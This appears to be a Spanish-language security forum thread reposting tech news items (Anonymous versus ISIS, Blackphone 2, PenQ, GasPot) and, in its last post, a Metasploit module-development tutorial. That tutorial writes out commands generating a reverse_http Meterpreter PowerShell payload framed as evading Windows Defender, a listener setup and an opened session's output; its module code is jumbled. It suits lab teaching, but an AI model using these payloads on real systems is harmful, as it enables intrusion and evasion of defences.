- Apps gratis: las apps en iOS pueden resultar a veces un poco mejores, e incluso este sistema cuenta con exclusivas. Pero en Android los programas son más baratos en general, o incluso gratuitos. Así que se trata de un motivo claro por el que Android es mejor que iOS.

- Software libre: Android ofrece buena parte de su código de forma abierta, lo que permite que nazcan otros proyectos muy destacados, como Fire OS, el sistema operativo de las tablets de Amazon. Todos salimos ganando con esta generosa política.

- Material Design: creo que este es el aspecto más polémico de la lista, pero no me resisto a mencionarlo. El diseño Material Design de Android me parece realmente atractivo e intuitivo, mucho más que el aburrido aspecto de iOS 9.

- Respeto a los estándares: Android soporta cargadores microUSB y los nuevos USB Type-C, también USB OTG para usar memorias USB, tarjetas microSD, batería extraíble, vídeo inalámbrico DNLA... Apple siempre apuesta por lo propietario, lo que genera incomodidades y gastos extra.

- Dispositivos punteros: si echamos un vistazo a las especificaciones de los smartphones y tablets con Android veremos las razones por las que es mejor iOS. Siempre son más avanzadas que las de los iPhone e iPad. Puede que esto se debe en realidad a la tacañería de Apple, pero representa una limitación para iOS.

Así que ya conocemos 10 motivos por las que Android es mejor que iOS. No queremos decir que el sistema operativo de Apple sea un desastre, pero tampoco podemos negar que sufre carencias graves que debería resolver de forma urgente.


¿ Y tú qué opinas?


FUENTE| No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#25
¿Qué significa la declaración de "guerra cibernética" de Anonymous a Estado Islámico?





Aonymous le declaró "guerra cibernética" al grupo que se hace llamar Estado Islámico (EI) , para vengar lo ocurrido el viernes en París.

La organización de ciberactivistas prometió lanzar la "operación más grande" jamás realizada contra el grupo extremista en internet .

" Los ataques (de París) no pueden quedar impunes, por eso Anonymous de todo el mundo os vamos a dar caza", aseguró un individuo cubierto con la característica máscara de la organización, en un video difundido por internet.

"Esperad ciberataques, se ha declarado la guerra. El pueblo francés es más fuerte que vosotros y saldrá fortalecido de esta atrocidad", agregó.

El vídeo, difundido a través de YouTube, tiene una duración total de dos minutos y medio y concluye con el sonido de las primeras declaraciones del presidente francés, François Hollande, tras conocerse los atentados.

Hollande sobre los ataques en París: "Francia está en guerra" "Sí, alimañas asesinas de inocentes, vamos a ir a por vosotros. Ya lo estábamos haciendo desde los ataques a Charlie Hebdo. Vamos a encontraros y no os dejaremos huir", agrega el representante de Anonymous.

"Operación Estado Islámico"

En su video, el portavoz enmascarado también asegura que ya comenzaron su campaña contra los yihadistas en enero de 2015, cuando se produjeron los atentados contra la revista satírica Charlie Hedbo.

De hecho, poco después, en marzo, la organización publicó una lista con 9.200 cuentas de Twitter vinculadas, según los ciberactivistas, a simpatizantes de la organización extremista.



Según un informe de Foreign Policy, hasta el momento, los hacktivistas han logrado "desarmar" más 100.000 cuentas de Twitter, 149 páginas web y casi 6.000 videos propagandísticos relacionados con EI.

Y durante más de un año, voluntarios ocasionales y programadores experimentados han estado sumidos en esta batalla cibernética contra el grupo islamista radical y sus seguidores; una lucha que ha aumentado significativamente, tanto en frecuencia como en visibilidad, en los últimos nueve meses.

Muchos de estos piratas informáticos, la gran mayoría de ellos (aunque no todos) vinculados a Anonymous, trabajan desde diversas partes del mundo y provienen de ámbitos muy diferentes.

No tienen mucho en común, excepto la pasión por la informática y el objetivo de atacar a los extremistas como parte de una campaña global que han denominado #OpISIS (operación Estado Islámico).

Pero, a pesar de la meta común, algunas opiniones dentro del colectivo se encuentran divididas en torno a una pregunta: si Anonymous defiende el uso de internet sin restricciones, ¿debería esta garantía aplicarse a todo el mundo, incluidos los miembros de organizaciones radicales?

En debates públicos y privados en el ciberespacio, algunos autoproclamados miembros de Anonymous luchan por reconciliar las voces del colectivo, reza el informe de Foreign Policy.

Mientras tanto, la "guerra cibernética" contra EI ya se ha puesto en marcha. Pero, ¿hasta qué punto es significativa esta lucha en el ciberespacio? Los límites entre la propaganda de guerra y la libertad de expresión

Estado Islámico utiliza ampliamente internet, ya sea para propaganda viral, en labores de reclutamiento o para comunicaciones entre los simpatizantes del grupo extremista. Twitter comenzó siendo la red social más utilizada por excelencia, ya que les permitía difundir su torrente propagandístico sin complicaciones.

El año pasado, en su avance en Mosul, Irak, los extremistas difundieron mensajes en esta red social con el hashtag #AllEyesOnISIS, saturando al mundo con un video en el que asesinaban al periodista norteamericano James Foley, para después difundir también otras ejecuciones de activistas y periodistas occidentales.



Otra etiqueta en la misma red social, #AMessageFromISISToUS, provocó una lluvia de mensajes entre norteamericanos y militantes de EI. Durante meses, Twitter tuvo problemas para conciliar su política de libertad de expresión con su nuevo papel como herramienta propagandística de parte de los extremistas en todo el mundo.

Pero eventualmente la red social tomó medidas, eliminando algunas cuentas: el 2 de abril suspendió 10.000 cuentas directamente relacionadas con EI y aumentó algunas medidas de seguridad. Aun así, los yihadistas mantuvieron su robusta presencia en la red social.

Y algunos de sus usuarios lograron burlar las nuevas medidas de Twitter: la cuenta de Asawitiri Media, por ejemplo, fue relanzada hasta 122 veces, obteniendo 10.000 nuevos seguidores en tan sólo 24 horas.

Sin embargo, en muchos casos el cierre repetido de las cuentas llevó a los extremistas a distribuir su propaganda a través de una nueva plataforma: la aplicación de mensajería móvil Telegram, que es considerada una de las más seguras.

Por qué Telegram es la aplicación preferida por Estado Islámico

La organización utiliza ampliamente ambas plataformas, tanto Twitter como Telegram. Pero expertos sostienen que algunas operaciones de EI en redes sociales están siendo manejadas por contratistas y voluntarios desde diversos lugares el mundo, y quizás lejos de los territorios ocupados en Siria e Irak.

Los hacktivistas también han invertido grandes esfuerzos en destruir las nuevas páginas web del grupo para difundir noticias y recaudar donaciones para el grupo extremista.

"Si podemos romper sus canales de comunicación tendrán menos fuerza", dijo a Foreign Policy @DigitaShadow, uno de los hacktivistas.

Y otra de las campañas en contra de EI en Internet -y una de las más surrealistas- es el personaje de anime ISIS-chan, que comenzó tras el rapto y ejecución de los japoneses Haruna Yukawa y Kenji Goto en enero de 2015.

ISIS-chan es un personaje de ficción que pretende "perturbar la propaganda de Estado Islámico en internet", a través de un personaje del manga "Moé", cuyo objetivo es "traer la paz y los melones" a los miembros de la organización extremista y enseñarles que "los cuchillos son para cortar fruta, no para la violencia".

Pero una guerra cibernética va más allá de la interrupción de la difusión de los mensajes propagandísticos.

¿Contraproducente para la seguridad?

Efectivamente, a lucha cibernética contra Estado Islámico también se ha expandido al espionaje y a los servicios de inteligencia.

Piratas informáticos de GhostSec, una organización formada en gran parte por exmiembros de Anonymous, que también luchan contra EI, se infiltran en foros yihadistas con el objetivo de descifrar las ubicaciones y direcciones electrónicas de los ciberyihadistas. Esta información es después enviada al servicio de inteligencia estadounidense.

La respuesta está en el hacker. En un principio, éstos enviaban información a direcciones al azar vinculadas con el gobierno estadounidense, pero después se asociaron con terceros para comunicar sus mensajes a los servicios de inteligencia de manera más eficiente.

Es por ello por lo que algunos expertos en seguridad consideran que la declaración de guerra de Anonymous podría ser "contraproducente".

Según declaró a AFP el experto en ciberseguridad Olivier Laurelli, la "guerra" declarada de Anonymous a EI "podría interferir en los esfuerzos de la policía a la hora de identificar a los miembros de EI y seguirles la pista".

"El cierre de esas cuentas hará que los investigadores policiales queden sordos y ciegos para muchas cosas", explicó Laurelli. Es interesante, por ejemplo, saber qué cuentas están activas en Francia, Siria o Irak", dijo.

"Poder identificar las conexiones y comunicaciones entre individuos es también fundamental, pero si Anonymous elimina esos vínculos, los investigadores llegarán a un callejón sin salida".

Nueva amenaza: ciberataques mortales

Por otra parte, según acaba de anunciar el ministro de finanzas británico George Osborne, los extremistas están tratando de desarrollar la capacidad de crear ciberataques mortales en el Reino Unido.

Según Osborne, los hackers islamistas pretenden hacerse con el control del suministro eléctrico de la nación, así como el control del tráfico aéreo y hospitales. De acuerdo con el ministro, EI ya ha demostrado su capacidad para "explotar internet con horribles fines propagandísticos", incluida la radicalización y la planificación de operaciones.

Pero el canciller británico advirtió que los yihadistas pretenden ahora apoderarse de las infraestructuras británicas para arrebatar vidas. "Desde nuestros bancos hasta nuestros coches, militares o escuelas. Todo lo que esté en internet es un objetivo", afirmó.

Osborne también aseguró que "los yihadistas todavía no cuentan con la capacidad para lograr algo así, pero sabemos que es lo que quieren hacer y estamos adoptando todas las medidas para evitarlo".

Ante la amenaza, el gobierno británico ha aumentado la seguridad y anunciado la contratación de más especialistas y cerca de 2.000 agentes de inteligencia. Además, Osborne anunció la creación de un nuevo Centro Nacional de Ciberseguridad que permita reunir a los mejores expertos del país.

Por su parte, Francia también anunció más inversión en equipos armados y movilizó a 115.000 oficiales de seguridad, según declaró el ministro del Interior Bernad Cazeneuve.


FUENTE| lanacion
#26

Un agente de la policía de Mountain View (California, Estados Unidos), detuvo uno de los coches sin conductor de Google por circular a una velocidad demasiado lenta.

El gigante del buscador cuenta ya con 1,2 millones de Google Cars o coches sin conductor en circulación sin embargo ya se ha llevado el primer "susto" cuando un agente de la policía cercano a su propia sede dio el alto a uno de estos coche por circular con "excesiva prudencia".

La zona en cuestión tiene marcado un límite de velocidad de 56 kilómetros por hora, según relatan en La Voz de Galicia, sin embargo el coche de Google estaba circulando a 38 km/h, algo que a este policía le resultó contraproducente así que decidió detener el coche.

Por suerte un técnico de Google se encontraba por las inmediaciones y finalmente, la multa que este agente le había puesto, no fue cursada.

Desde Google explican que la razón por la que sus coche sin conductor circulan a una velocidad tan moderada es totalmente intencionada, se debe a motivos de seguridad, es decir, evitar que se produzca cualquier tipo de accidente y así con ello que la población no acabe percibiéndolos como un peligro.

En la actualizad circulan en torno a 1,2 millones de estos coches sin conductor que, según ha explicado Google, equivalen a 90 años de experiencia al volante.

Por supuesto, Google también ha aprovechado la ocasión para bromear en su red social sobre este anecdótico incidente: "a los humanos no les mandan detenerse por eso tantas veces".


Fuente| googlelizados
#27


AndroTotal es un interesante servicio web gratuito donde podremos analizar APKs en busca de amenazas. Podemos comparar el servicio al de VirusTotal o al de Metascan, ya que entre sus utilidades se encuentra la de analizar los archivos con diferentes motores Antivirus pero que están especializados en el sistema Android.

A continuación comparto con vosotros algunas capturas de pantalla de una muestra de APK de Whatsapp que he descargado de un Black Market y que he pasado por el analizador:



Andrototal también nos permite ver los permisos, datos del paquete, actividades, etc. Aquí hay más información de cómo analizar APK con PHP.

Por otro lado, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, es un interesante sitio web que nos permite analizar un binario en busca de actividades sospechosas. Se pueden analizar binarios de forma gratuita, aunque el servicio no es inmediato, y puede tardar algunas horas en finalizar el proceso, en función del número de análisis que tengan en cola.


ANDROTOTAL: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
REVERSE.IT : No tienes permitido ver los links. Registrarse o Entrar a mi cuenta


FUENTE|blog.segu-info.com.ar
#28

¿Eres un ciberdelincuente? Los 7 delitos digitales más comunes que puedes estar cometiendo.



Puede que seas un ciberdelincuente... pero todavía no lo sabes. ¿Alguna vez has espiado el móvil de tu pareja? ¿Has grabado a alguien sin su consentimiento? ¿O has hecho una "inocente" broma telefónica haciéndote pasar por otra persona? Sigue leyendo, esto puede interesarte.

El número de ciberataques están en aumento. Como indican todos los informes, la cantidad de ataque informáticos y ciberdelitos, tanto dirigidos a empresas como a usuarios, no deja de crecer. Los motivos son variados, pero por lo general el objetivo de los criminales es obtener dinero a través de ellos. Pero... ¿puede un cibercriminal no saber que está cometiendo un delito en la red? Sí, tú podrías ser uno de ellos. Seguramente no te estés lucrando por ello, pero podrías estar cometiendo delitos graves penados por la ley. La firma de peritaje informático Aldama Informática Legal ha elaborado una lista de los delitos informáticos más comunes que cometen los usuarios, ya sea por desconocimiento de la ley o por descuido.



Espiar el móvil de tu pareja.

¿Cuántas parejas se habrán roto gracias a una "pillada" por un mensaje o un e-mail? "Inocentemente" coges el móvil de tu pareja y revisas los mensajes... O se deja el portátil encendido y le echas un vistacito a su email. Pues ya has cometido un delito. Leer los e-mails, WhatsApp o mensajes de otras personas (aunque sea tu pareja, o un familiar), atenta contra uno de los derechos básicos: el secreto de las comunicaciones y la intimidad. Si además se usa para algún fin (como demostrar una infidelidad), puede acarrear incluso penas de prisión. Y no es una teoría, sino que ha ocurrido recientemente: una sentencia condenó a un hombre a prisión por espiar el móvil de su pareja. Demostró la infidelidad, sí, pero cometió un delito para hacerlo.

Grabar sin consentimiento.

Para empezar, hay que aclarar que es ilegal grabar a otra persona sin su consentimiento. En un momento en el que sacamos la cámara del móvil a la mínima de cambio, hay que tener cuidado. Obviamente, no estamos hablando de fotos inocentes: casos como grabar a tu pareja siéndote infiel, filmar escenas de cibersexo o guardar fotos íntimas sin consentimiento, son considerados delitos que pueden incurrir en multas o incluso penas de cárcel.

Suplantación de identidad.

Cuidado con gastar bromitas en la red, pueden salirte caras. Hacerte pasar por otra persona (aunque sea un conocido) en las redes sociales, mensajes, chats o llamadas puede ponerte en un aprieto. Eso sí, por lo general se considera un delito cuando se busca un provecho mediante esa suplantación. Pero según alertan desde Aldama, han tenido casos de denuncias por suplantación ante grupos de conocidos. Ándate con ojo, una broma de mal gusto puede sentarle mal a alguien.

Amenazas en redes sociales.

Resulta bastante obvio, no se debe amenazar ni insultar a nadie (en general), y tampoco en las redes sociales. No son pocas las veces que artistas, políticos o usuarios bocazas en las redes sociales publican posts que son una provocación al insulto o la amenaza. Pero respira profundamente tres veces y piénsatelo antes de responder o comentar. Hay que ser responsable con lo que se publica en la red, tiene consecuencias ante la justicia.

Revelar secretos.

Todos tenemos secretos, y compartimos secretos de otras personas. Y es probable que alguna vez hayas pensado en publicar más de uno cuando alguien te ha hecho una "jugarreta". Pero cuidado, publicar un secreto o intimidad de una persona a través de las redes sociales o por mensajes, aunque sea un amigo, se considera un delito si no hay consentimiento.

Acoso en Internet.

En algunas ocasiones, incluso para la justicia, es difícil trazar la línea entre lo que se considera acoso y lo que no. Para ti pueden ser una serie de mensajes amorosos inocentes... para la otra persona puede ser un acoso sexual. Tenlo presente a la hora de enviar mensajes, emails... Puedes traspasar la línea y convertirte en un delincuente informático.

Contenido pedófilo.

Tú nunca has descargado contenido pedófilo. Pero... ¿has descargado películas o series a través de la red? Esto de por sí es ilegal, pero uno de los delitos más graves que se pueden cometer sin darse cuenta es descargar material de internet y que dentro haya contenido pedófilo sin que nos demos cuenta. Un caso muy grave que en el mayoría de los casos el usuario no tiene conocimiento de que está almacenando o distribuyendo algo completamente ilegal. Eso sí, un perito informático puede demostrar si los documentos han sido visionados o no, y si se tenía conocimiento de su existencia.

Como explica Carlos Aldama, "es muy común incurrir en delitos informáticos sin saberlo. La descarga de películas o música no es legal y, sin embargo, encontramos a muchos usuarios que además de descargar este tipo de archivos, también los están compartiendo, sin saber que son los responsables de la distribución de material protegido".

¿Consejos? Conocer cuáles son los delitos, para no cometerlos, y usar el sentido común a la hora de navegar por la red y usar sus servicios. Seguro que muchos de estos delitos digitales los conocías... Otra cosa es que miraras hacia otro lado. Pero si los cometes, de nada te servirá decir que no sabías que eran delito. Avisado estás.



FUENTE| globbsecurity
#29


Como ya sabemos (y se han encargado de demostrarnos), prácticamente cualquier sistema es susceptible de ser atacado. Dispositivos, infraestructuras críticas, coches... Gasolineras. Si, este era uno de los siguientes pasos lógicos. Por eso, el equipo de investigación de la firma de seguridad Trend Micro ha puesto a prueba la seguridad de los sistemas automatizados de los tanques de combustible.

Y es que, la manipulación de estos tanques podría resultar muy peligrosa. No solo por la volatilidad del combustible y la peligrosidad física que un ataque así podría implicar, sino por las implicaciones de tocar la fibra sensible a uno de los sectores económicos más potentes como es el petrolífero. Pero este sector no está exento de riesgos (ninguno lo esté) y menos ahora que cada vez más compañías petroleras usan sistemas conectados a la red para controlar sus tanques.

Manipular los tanques para convertirlos en riesgos para la seguridad pública.

En la prueba realizada por Trend Micro, usaron un honeypot personalizado al que han denominado GasPot. Con él, podían saber cómo los atacantes explotaban el sistema y qué objetivos eran sus preferidos. Como esperaban, los honeypots localizados en Estados Unidos han sido los favoritos de los ciberdelincuentes.

Los ataques que se pueden realizar depende de la sofisticación de los sistemas de control que están instalados en los tanques. Los más simples sólo permiten el acceso al estado del sistema, pero los más complejos permiten acceder al control de los tanques y su manipulación.

Pero, ¿qué implicaciones podría tener esto? Los ataques dependen de las motivaciones de los posibles atacantes: desde simples actos de vandalismo, hasta ataques más sofisticados y maliciosos, como modificar el comportamiento de los tanques, lo que les podría convertir en potenciales riesgos para la seguridad pública.

La solución es un desafío cuando las infraestructuras están conectadas a la red

Siempre es complicado aplicar parches cuando los sistemas y las infraestructuras están conectadas a Internet. En el caso de los sistemas SCADA, según la información que se puede manejar en estos momentos, todo sugiere que las organizaciones no están preparadas todavía para parchear este tipo de sistemas. Según el informe de 2013 de la Agencia Europea de Seguridad para la Red y Seguridad de la Información (ENISA), menos del 20% de las organizaciones se preocupó por instalar los parches ICS / SCADA que sus proveedores les proporcionaban.

Según explican desde Trend Micro, en el mundo del software de consumo, esto no sería aceptable. Pero sobra decir que la seguridad de este tipo de dispositivos y sistemas es prioritaria.

La firma de seguridad ha lanzado el estudio "Experimento GasPot: peligros no examinados en el uso de sistemas de control de depósitos de gasolina"  que puede ser visitado para conocer más detalles de este proyecto.


FUENTE| globbsecurity
#30


El Blackphone, un dispositivo Android especialmente diseñado para proteger tu privacidad de los hackers y los espías del gobierno, tuvo tanto éxito que ya existe el Blackphone 2.

Silent Circle, el fabricante del teléfono, presentó su smartphone de segunda generación el lunes 28 de septiembre. Cuesta 799 dólares (unos 13,500 pesos).

Por fuera parece que es un smartphone de gama alta como cualquier otro. Tiene una pantalla de 5.5 pulgadas, dos cámaras (13 megapixeles en la trasera y cinco en la frontal), 32 gigabytes de memoria interna y un poderoso procesador Qualcomm.

Pero la magia está en su interior. Tiene funciones de privacidad incluidas que superan por mucho a los dispositivos de Apple, Microsoft o Samsung.

Si te importa más que nada la privacidad, este probablemente es el teléfono adecuado para ti.

Su principal atractivo es el "centro de seguridad" del teléfono, en donde los usuarios pueden seleccionar a detalle exactamente qué información puede compartir el teléfono con cada aplicación.

Las aplicaciones (ya sean mapas, juegos o redes sociales) son famosas por registrar datos sumamente personales y por compartirlos discretamente con empresas de publicidad y otros negocios.

Los dispositivos Android y los iPhones te permiten que controles algunos "permisos", tales como impedir que una aplicación registre tu ubicación. Sin embargo, el Blackphone te deja que veas cada cosa que recaba una aplicación, incluso el sonido que registra a través de tu micrófono.

Te sorprenderías con lo que encontrarías.

También está la plataforma de comunicación integrada sumamente privada del Blackphone. Todos los demás teléfonos celulares hacen las llamadas telefónicas comunes a través de la red celular. Eso significa que los operadores de las redes, tales como AT&T y Verizon, pueden ver quién llama a quién y los gobiernos pueden entrar en esas redes para escuchar.

Los Blackphones cuentan con un software especial que cifra las llamadas telefónicas y los mensajes de texto. Ese servicio es gratuito el primer año y después cuesta 25 dólares (unos 425 pesos) al año.

El Blackphone 2 también tiene "espacios" independientes que esencialmente te permiten que tengas teléfonos completamente diferentes con grados de privacidad variables en el mismo dispositivo. Con unos cuantos clics, puedes cambiar rápidamente de la función de teléfono común (con rastreo o envío de datos promedio) a un teléfono superprivado ideal para un espía (todo está cifrado y se bloquean todas las aplicaciones).

El dispositivo también soluciona el problema de la confianza con el Wi-Fi. Las redes públicas fuera de casa usualmente son inseguras. Bueno, pues el Blackphone 2 te permite que configures el teléfono de forma que el Wi-Fi se desactive en cuanto cruces la puerta, con lo que se evitará que tu teléfono se conecte accidentalmente a cualquier red Wi-Fi a lo largo del día.

También hay una función adicional que no se ve con frecuencia. Apple y Google tienen acceso secreto a los mensajes y las fotos de tu teléfono si usas los servicios en línea de iCloud o de Google. Sin embargo, Silent Circle afirma que nunca tiene acceso a tus datos, así que no puede dar nada a las corporaciones de seguridad.

De hecho, la empresa está decidida a impedir que los gobiernos rastreen a sus clientes. Por eso, el año pasado, Silent Circle trasladó sus oficinas de Estados Unidos a Suiza.

Hoy se sabe que el gobierno estadounidense convoca a las empresas estadounidenses regularmente a un tribunal federal secreto conocido como FISA y los obliga a entregar los datos de los clientes. El director de Silent Circle, Bill Conner, dijo a CNNMoney que no puede arriesgarse a que lo saquen del negocio con una sola orden judicial secreta.

"Nunca le daré al gobierno una entrada no oficial", dijo Conner.

Lo irónico es que la empresa señalara que las funciones de seguridad extrema del teléfono han llamado la atención de algunas unidades del FBI y de espías estadounidenses en el extranjero.

Pero ¿funciona en realidad? La empresa afirma que es la mejor opción que existe y algunos expertos en seguridad en la tecnología dicen que el Blackphone ciertamente es un avance. Pero solo el tiempo lo dirá.


FUENTE| cnnexpansion
#31


PenQ es un navegador para Linux de código abierto creado para realizar test de penetración de aplicaciones web, construido sobre Mozilla Firefox. Viene configurado con herramientas de: búsquedas avanzada en Internet, fingerprinting, navegación anónima, escaneo de servidor web, fuzzing, generación de informes de resultados de test de penetración y muchos más. PenQ no es sólo una mezcla de complementos, viene configurado con algunas herramientas de código abierto muy poderosas programadas en Java y Python como:

·OWASP ZAP.
·OWASP WebScarab.
·OWASP WebSlayer.
·Escaner de servidores Web Nikto.
·Fuzzer de aplicaciones Web, Wfuzz.
·Con Tor integrado.
·Generador de informes de test de penetración.
·Base de datos con vulnerabilidades.
·Colección de Add-ons Mozilla: anonymoX, Awesome Screenshot, ChatZilla, CipherFox, Clear Console, Cookies Manager+, Cookie Monster, CryptoFox, Email Extractor, Firebug, FireFlow, FireFTP, FireSSH, Greasemonkey, Groundspeed, HackBar, HackSearch, Header Spy, HttpFox, HttpRequester, Java Deobfuscator, Library Detector, LinkSidebar, Proxy Selector, Proxy Tool, RefControl, RESTClient, Session Manager, SQL Inject Me, SQLite Manager, No tienes permitido ver los links. Registrarse o Entrar a mi cuenta, User Agent Switcher, Wappalyzer, Web Developer, Xinha Here! y XSS Me.



PenQ está configurado para ejecutarse en distribuciones basadas en Debian y sus distribuciones derivadas, incluyendo Ubuntu y los sistemas operativos de pruebas de penetración como: BackTrack y Kali. PenQ permite acceder a utilidades del sistema en ejecución y a las herramientas necesarias para ahorrar tiempo y hacer pruebas mucho más rápido. Posee herramientas integradas para la navegación anónima, supervisión del sistema, para tomar notas y programar tareas.

También proporciona manuales mediante enlaces a OWASP Testing Guide, una vasta fuente de conocimientos relacionados con las pruebas de seguridad.

Más información y descarga de PenQ:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Navegador Web con herramientas integradas para test de penetración en aplicaciones Web:
No tienes permitido ver los links. Registrarse o Entrar a mi cuenta



FUENTE: gurudelainformatica

#32


Ella sabe que es bella y talentosa. Conoce sus fortalezas y debilidades. Parisa Tabriz está más que consiente de su capacidad. Tiene origen iraní, experta hacker, al mando de uno de los equipos de seguridad más importantes de Google. Una treintena de hackers que se encargan de velar por la seguridad de Chrome, el navegador de Internet utilizado por más de mil millones de personas en todo el mundo. Ella se considera White hat (sombrero blanco). Elogiada por sus compañeros de trabajo, tanto que la han apodado "Security Princess". Tabriz es, sin duda, una de las hackers más letales detrás Google.



Su padre es un médico iraní que emigró a Estados Unidos y su madre una enfermera polaca. Formó parte del informe de Forbes como una de las 30 personas de todo el mundo menor de 30 años, cuya carrera había que seguir con atención.

En la Univesidad de Illinois estudió Ingeniería Informática. Cuenta que decidió convertirse en hacker cuando descubrió los trabajos de John Draper, uno de los primeros hackers de la red que consiguió hackear los teléfonos de la época para hacer llamadas internacionales gratuitas. Lo hacía regalando silbatos en las cajas de cereales Cap'n Cruch, el cual emitía un tono de 2600 Hz (la misma frecuencia de los teléfonos celulares), con esto era suficiente para llamar al extranjero de forma sin pagar un centavo.

Esta consumada hacker se dedica a atacar casi todos los días a Google, para comprobar su seguridad. También forma al equipo de hackers de la compañía, y realiza seminarios con jóvenes hackers, para atraerles "al lado luminoso".



Parisa Tabriz comenzó a formar parte de Google en el año 2007. Segura siempre de sí misma, es la niña mimada de Google.

Gracias a Parisa Tabriz y su equipo, mil millones de personas navegan seguras mientras visitan páginas web con el navegador Chrome.


FUENTE| telegraph
#33


Vamos a cubrir el uso básico de Pry para escribir un modulo sencillo que enumerará las excepciones configuradas en Windows Defender en una maquina OS X o Linux. Aunque se puede desarrollar para Metasploit en una máquina que esté corriendo Windows no es recomendado debido a todas las limitantes que nos trae. Pry es un módulo de Ruby que se puede usar en vez de irb para tener una sesión interactiva dentro del contexto del framework para ejecutar comandos y pruebas. El mismo actúa como un prompt que podrí­amos tener en bash o en otra consola, lo cual lo hace familiar para el rápido aprendizaje del mismo.

Comencemos con preparar una estructura de carpetas similar a la estructura que usa Metasploit Framework para sus módulos y la inicializamos con git de manera de poder tener control de versión de la misma.

Código: php
infidel01:~ carlos$ mkdir -p modulos/post/windows/gather

infidel01:~ carlos$ cd modulos/

Initialized empty Git repository in /Users/carlos/modulos/.git/


infidel01:modulos carlos$ git init



Una vez inicializado podermos crear el módulo que estaremos escribiendo y lo añadimos a la base de datos de control de git.


Código: php
infidel01:modulos carlos$ touch post/windows/gather/get_windefender_exclusions.rb


infidel01:modulos carlos$ git add post/windows/gather/get_windefender_exclusions.rb



Abrimos en nuestro editor favorito el archivo que creamos y creamos lo que llamo el esqueleto de un modulo de post-exploitation en el cual incluimos el mixin de registry para Windows y de reporte.

Añadimos información general como la licencia, autor, que es para un sistema Windows y que el tipo de sesión es Meterpreter.

Los mixin serían:

* Msf::Post::Windows::Registry
* include Msf::Auxiliary::Report

El modulo se vería así

Código: php
##


# This module requires Metasploit: http://metasploit.com/download

# Current source: https://github.com/rapid7/metasploit-framework

require 'msf/core/auxiliary/report'

##

require 'msf/core'
require 'rex'

class Metasploit3 < Msf::Post

include Msf::Auxiliary::Report

include Msf::Post::Windows::Registry

  def initialize(info={})

'Name'          => 'Windows enumerate Windows Defender exclusions.',

super( update_info( info,
      'Description'   => %q{

'License'       => BSD_LICENSE,

Windows enumerate Windows Defender exclusions.
      },

'Author'        => [ 'Carlos Perez ' ],


'Platform'      => [ 'win' ],


'SessionTypes'  => [ 'meterpreter' ]

))
  end

  def run()

print_status("Running post module against #{sysinfo['Computer']}")

end

end



Generemos un payload en formato PowerShell de manera que evite la detección del mismo Windows Defender dandole como LHOST el IP de la máquina donde esta msfconsole corriendo:


Código: php
msf > use payload/windows/meterpreter/reverse_http


msf payload(reverse_http) > set LHOST 192.168.100.2

LHOST => 192.168.100.2

msf payload(reverse_http) > generate -t psh-reflection -f /tmp/dev_payload.ps1

[*] Writing 2673 bytes to /tmp/dev_payload.ps1...

msf payload(reverse_http) >



Ahora usando el Multi Handler creamos un trabajo que recibirá la sesión usando la información previa, ponemos ExitOnSession en falso de manera que siga escuchando por mas conexiones una vez establezca una e inicializamos el mismo como un job y en background.


Código: php
msf exploit(handler) > set PAYLOAD windows/meterpreter/reverse_http

PAYLOAD => windows/meterpreter/reverse_http

LHOST => 192.168.100.2

msf exploit(handler) > set LHOST 192.168.100.2

msf exploit(handler) > exploit -j -z

msf exploit(handler) > set ExitOnSession false
ExitOnSession => false

[*] Started HTTP reverse handler on http://0.0.0.0:8080/

[*] Exploit running as background job.


msf exploit(handler) > [*] Starting the payload handler...



En nuestra máquina Windows 8/8.1/10 abrimos Windows PowerShell x86 y copiamos el contenido del PS1 en la misma pantalla y lo ejecutamos, una sesión debe ser creada en msfconsole.

Código: php
msf payload(reverse_http) > 


[*] 192.168.100.176:51786 (UUID: b0790294217a0a22/x86=1/windows=1/2015-09-22T18:32:23Z) Staging Native payload ...

[*] Meterpreter session 1 opened (192.168.100.1:8080 -> 192.168.100.176:51786) at 2015-09-22 14:32:24 -0400

Type: meterpreter x86/win32

msf payload(reverse_http) > sessions -v

Active sessions
===============

  Session ID: 1

Via: exploit/multi/handler

Info: WIN-RB3R8HILN3R\Carlos Perez @ WIN-RB3R8HILN3R
      Tunnel: 192.168.100.1:8080 -> 192.168.100.176:51786 (192.168.100.176)

CheckIn: 4s ago @ 2015-09-22 14:40:19 -0400

UUID: b0790294217a0a22/x86=1/windows=1/2015-09-22T18:32:23Z
   MachineID: 272520e89cdbf67b2d3f87c9696871cd
  Registered: No



Ahora podemos decirle a msfconsole que cargue el modulo que creamos del directorio de desarrollo.

Código: php
msf payload(reverse_http) > loadpath ~/modulos

Loaded 1 modules:

1 post



Cargamos el modulo de manera de poder configurar el mismo con la sesión que creamos previamente y probamos que podemos ver su información.

Código: php
msf exploit(handler) > use post/windows/gather/get_windefender_exclusions 

msf post(get_windefender_exclusions) > set SESSION 1
SESSION => 1

Name: Windows enumerate Windows Defender exclusions.

msf post(get_windefender_exclusions) > info

     Module: post/windows/gather/get_windefender_exclusions

Carlos Perez

Platform: Windows
       Arch:
       Rank: Normal

Provided by:




Basic options:


Name     Current Setting  Required  Description

----     ---------------  --------  -----------

SESSION  1                yes       The session to run this module on.

Description:

Windows enumerate Windows Defender exclusions.



Nuestro módulo ya está apuntando a una sesión y podemos comenzar a usar pry para explorar lo que tenemos disponible bajo su contexto dentro de Metasploit Framework. Esto lo conseguimos comenzando la terminal de pry dentro del mismo msfconsole entrando el commando:


Código: php
msf post(get_windefender_exclusions) > pry


[1] pry(#)>


El prompt será una largo por que tiene información del módulo donde estamos. Dependiendo del tamaño de pantalla que estemos usando, el mismo puede ser un tanto incómodo. Una manera para hacer el mismo má sencillo es usando el comando simple-prompt.

Código: php
pry(#)> simple-prompt


>>



Para ver la ayuda de Pry entramos el comando de help, para paginar el mismo presionamos la tecla de espacio y para salir de la ayuda presionamos la tecla de Q.

Código: php
>> help


Comenzaremos con ver el código fuente del modulo mismo usando el comando show-source:
Código: php
>> show-source


Ahora miremos todas los métodos y funciones que podemos ejecutar bajo el contexto del modulo usando el comando de ls, podemos igual que antes paginar usando la tecla de espacio y salir presionando la tecla Q:

Código: php
>> ls


como estaremos trabajando con el registry listemos solo los métodos relacionados con el mismo dándole el nombre del mixin de registry que importamos, el comando sería "ls Msf::Post::Windows::Registry"



Código: php
>> ls Msf::Post::Windows::Registry


constants: REGISTRY_VIEW_32_BIT  REGISTRY_VIEW_64_BIT  REGISTRY_VIEW_NATIVE

